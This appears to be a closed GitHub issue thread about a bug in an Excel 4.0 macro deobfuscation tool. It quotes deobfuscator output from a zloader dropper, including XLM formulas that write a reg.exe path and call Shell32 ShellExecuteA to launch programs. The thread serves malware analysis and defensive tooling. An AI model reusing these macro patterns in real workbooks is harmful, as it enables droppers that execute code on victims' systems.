Closed spencerwp closed 4 years ago
While only checking for value set on cell, not formula, it seems like formulas that haven't been evaluated cause interactive mode to enable (where the cell is used in an unimplemented function call).
FORMULA.FILL("=""C:\Windows\system32\reg.exe""",Sheet2!EK32166)
CELL:C36621 , FullEvaluation , FORMULA.FILL("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-4456]C[138],R[-35425]C[90],0,5)",Sheet2!C36622)
Process Interruption: CELL:C36622 =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open",R[-4456]C[138],R[-35425]C[90],0,5) Partial Eval: CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open",EK32166,CO1197,0,5) EK32166 is not populated, what should be its value? Enter XLM macro: Tip: CLOSE() or HALT() to exist
Great fix! the colors are shifted 8 in xlrd!
Regarding the height, also great catch. Forgot to sync XLSMWrapper with XLSWrapper
With these properties added I can fully decode a new zloader dropper